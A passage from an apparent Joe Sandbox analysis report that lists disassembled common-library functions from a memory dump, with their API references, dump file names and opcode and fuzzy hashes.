                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ErrorLastsend
                          • String ID:
                          • API String ID: 1802528911-0
                          • Opcode ID: c1a7733c47904b58b66acab8c05f416d48a9f7c96c512138a0325fc672db7c2f
                          • Instruction ID: 35dbaf7e16c610af3f3821290721dfc30268a207d890698756e976651b722054
                          • Opcode Fuzzy Hash: c1a7733c47904b58b66acab8c05f416d48a9f7c96c512138a0325fc672db7c2f
                          • Instruction Fuzzy Hash: 8E014F35200200AFD714EF68D891F6AB7E9EF99721F1085AEEA5A87391DB70EC05CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B24274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B2889E: __getptd_noexit.LIBCMT ref: 00B2889E
                          • __lock_file.LIBCMT ref: 00B242B9
                            • Part of subcall function 00B25A9F: __lock.LIBCMT ref: 00B25AC2
                          • __fclose_nolock.LIBCMT ref: 00B242C4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                          • String ID:
                          • API String ID: 2800547568-0
                          • Opcode ID: 2eb68c67bfabb5d9c28d1e441291f00e57de5598be8e3c2a47b94ae26f241c1e
                          • Instruction ID: 9cc2e67f3b80901ed48fe83cb1fb060eee2167fd52179bd0b0a4a60363f6d6ef
                          • Opcode Fuzzy Hash: 2eb68c67bfabb5d9c28d1e441291f00e57de5598be8e3c2a47b94ae26f241c1e
                          • Instruction Fuzzy Hash: A7F0B431921734DAD710AB76A8027AE67E06F41334F2182C9B82C9B5D1CBBC9D019B55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1F55E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                          Download Yara Rule
                          APIs
                          • timeGetTime.WINMM ref: 00B1F57A
                            • Part of subcall function 00B0E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B0E279
                          • Sleep.KERNEL32(00000000), ref: 00B775D3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessagePeekSleepTimetime
                          • String ID:
                          • API String ID: 1792118007-0
                          • Opcode ID: 3a556596964007a206d147be11939cdd1f5aa1e0a52bc7330822c5de9603fb3c
                          • Instruction ID: 99c9a1ffde7f8d99c38898598c52c2a7610ec00a2ffb63a1956e092d0a10de77
                          • Opcode Fuzzy Hash: 3a556596964007a206d147be11939cdd1f5aa1e0a52bc7330822c5de9603fb3c
                          • Instruction Fuzzy Hash: DAF058712402159BD314EB69D445BA6BBE8AF58320F0005AAF81AD72A2DF70A800CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B081C6 Relevance: 1.9, APIs: 1, Instructions: 438COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B084A6: __swprintf.LIBCMT ref: 00B084E5
                            • Part of subcall function 00B084A6: __itow.LIBCMT ref: 00B08519
                          • __wcsnicmp.LIBCMT ref: 00B083C4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __itow__swprintf__wcsnicmp
                          • String ID:
                          • API String ID: 712828618-0
                          • Opcode ID: d34b9a7776e0dbde454395f289cf0baad1fac1067582301f0ea67cce82e9bae9
                          • Instruction ID: 7ac62f875db8f87f5ac2c2d7c531c5322911f87d507819707680f3320192b20f
                          • Opcode Fuzzy Hash: d34b9a7776e0dbde454395f289cf0baad1fac1067582301f0ea67cce82e9bae9
                          • Instruction Fuzzy Hash: E3F16B71508302AFC704DF18C89186EBBE5FF98344F5489ADF999973A1EB30EA45CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B14040 Relevance: 1.7, APIs: 1, Instructions: 187COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                          • Instruction ID: 995695fa2688946f0b0796e1b2b1a8fc1c44f2b015429f0551bcef6af0ece427
                          • Opcode Fuzzy Hash: 9ca599920e64f453315c057626f71e299ebb78824d6afaa63b8979ad9d3f7f0c
                          • Instruction Fuzzy Hash: 9D61B374A00206AFCB00DF55C8C4ABAF7E5FF18310F9482A9E929D7291D730EDA5CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1EF0D Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7833f2e7c3d6235f090831a7bb8901458a7f75807a1f42291a167c6149d5afe6
                          • Instruction ID: 8ec588211c34b4224faa5e8b10b757dd3f4e343af4fcc2ce64831c6aeb58ac66
                          • Opcode Fuzzy Hash: 7833f2e7c3d6235f090831a7bb8901458a7f75807a1f42291a167c6149d5afe6
                          • Instruction Fuzzy Hash: 13519135600514AFCF14EF68C991EBE7BE6AF48310B1481E9FA1A9B2D2DB30ED45DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B0B6D0 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                          • Instruction ID: e5ae7d81e84c7b648e7a154717690ad70edcef4dbcd93ddf8ed852618376ceab
                          • Opcode Fuzzy Hash: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                          • Instruction Fuzzy Hash: 29417B792006029FC7249F19D491962FBE1FF89361714C4AAE99A8B7A1DB30EC61CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B04EE9 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                          Download Yara Rule
                          APIs
                          • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00B04F8F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: FilePointer
                          • String ID:
                          • API String ID: 973152223-0
                          • Opcode ID: c03afa6a8da6235958eb367b021cbcd296683af83f643db69c30d11e727b8ce6
                          • Instruction ID: 84852e932765b6e6b2aa861768ef71ad28f6c8bf6338c45df3e6c0f1f1cd67c1
                          • Opcode Fuzzy Hash: c03afa6a8da6235958eb367b021cbcd296683af83f643db69c30d11e727b8ce6
                          • Instruction Fuzzy Hash: CB315DB1A00616AFCB08DF6CC484AADBBF5FF48310F1486A9E91993790D770B960CBD0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1F92C Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: select
                          • String ID:
                          • API String ID: 1274211008-0
                          • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction ID: b03b1bba1254f026e2c3ce41a27e7d4881ec5299db888f4ae13aa79d0da0ce6b
                          • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                          • Instruction Fuzzy Hash: F031B870A00106ABC718EF58D4D0AA9F7E6FF89390BA486E5E449CB255D731EDC1CBD0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B04D67 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: ce2e04bcfbbf536308b925bfeda2804b55747d519a548e13e047a64db7763ad8
                          • Instruction ID: 0fd8f2aa5a884bb23ef244e429a34ca69a4b46cc188126201a7787214547a8a3
                          • Opcode Fuzzy Hash: ce2e04bcfbbf536308b925bfeda2804b55747d519a548e13e047a64db7763ad8
                          • Instruction Fuzzy Hash: 7F21F0B0600608EBCF189F15E8846A97FF8EB56341F21CAE9E4AAD6050EB709DE0C755
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B0D805 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                          • Instruction ID: e5b2b9de064b6e8dc348bf8fae95962ca367cbee52da0c2eb51335afe6fb1c39
                          • Opcode Fuzzy Hash: 850a3e34ffcf0575de9322bf5b98585c373294fd89485bbbcd9ce223ec0d444b
                          • Instruction Fuzzy Hash: AE113A75600701DFC724DF68E481916BBE9FF49310720C4AEE88ECB6A1E732E841CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B03F9B Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00B03F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00B03F90
                          • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00B034E2,?,00000001), ref: 00B03FCD
                            • Part of subcall function 00B03E78: FreeLibrary.KERNEL32(00000000), ref: 00B03EAB
                            • Part of subcall function 00B04010: _memmove.LIBCMT ref: 00B0405A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Library$Free$Load_memmove
                          • String ID:
                          • API String ID: 3640140200-0
                          • Opcode ID: fbc11a8ff993687fbd2dc59977c732146d9dc628489710d2df2214e5f1d8d8f7
                          • Instruction ID: 47dc3c423722be2155ed2724540f76cba2694e53e1d968aa181ed00764e25d97
                          • Opcode Fuzzy Hash: fbc11a8ff993687fbd2dc59977c732146d9dc628489710d2df2214e5f1d8d8f7
                          • Instruction Fuzzy Hash: 6C11E731600215ABCB10AF64DC1BF5D7FE99F40B00F108469F641F70D1EBB0DA009B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B080EA Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: 3e742b1ba0a0c987c836b15959b7f65b2bcde272eb65e0dd682e5ea94299c368
                          • Instruction ID: 042a7e4596126034d2589cbf0172cea94c2aeb06fb3c6d7329c6136fd9a669e1
                          • Opcode Fuzzy Hash: 3e742b1ba0a0c987c836b15959b7f65b2bcde272eb65e0dd682e5ea94299c368
                          • Instruction Fuzzy Hash: CF010C322056119FC710AF18D881D6BBBE8EF48360B14426AFC99972D1DF219D1187D0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B610E5 Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 7ba21c07caa7376311f1fff22362e3ba307f27c17f28bb0ce846a2df146a5c03
                          • Instruction ID: 450d236a87de7a3f50c51f7ff326fbd6ad068ec2c142349f27360f4a6b2b54fc
                          • Opcode Fuzzy Hash: 7ba21c07caa7376311f1fff22362e3ba307f27c17f28bb0ce846a2df146a5c03
                          • Instruction Fuzzy Hash: B2118C362012159FDB10CF19C880ADA77E9FF4A720B0985AAED49AB351CB34AD808B91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B04CA0 Relevance: 1.6, APIs: 1, Instructions: 51fileCOMMON
                          Download Yara Rule
                          APIs
                          • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,00B04E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00B04CF7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 3d96f5f1f344395695c603d8025098789435890c409afa3a1c056204760f3c83
                          • Instruction ID: 0b19c85b026d6c7a3ca289cfdcdd2f9526e96b89e2d27d1f142ee2023d05bdeb
                          • Opcode Fuzzy Hash: 3d96f5f1f344395695c603d8025098789435890c409afa3a1c056204760f3c83
                          • Instruction Fuzzy Hash: A01127B1201B459FE730CF16C880F66BBE9EF44754F10C56EE6AA86A90C7B1E844CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B04D29 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
                          • Opcode ID: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                          • Instruction ID: 87629178523643b702ccf6a5e993953d18d17306531c241bfddbe420c62a9dfd
                          • Opcode Fuzzy Hash: 8f18987bb35b2baff0789867a32b92a27879a4fd73e9d049a8f42728d02b6011
                          • Instruction Fuzzy Hash: 130171B5200502AFC3059B28C891D35FBE9FF8531075482A9E529C7742CB31AC21C7E0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B430AC Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _memmove
                          • String ID:
                          • API String ID: 4104443479-0
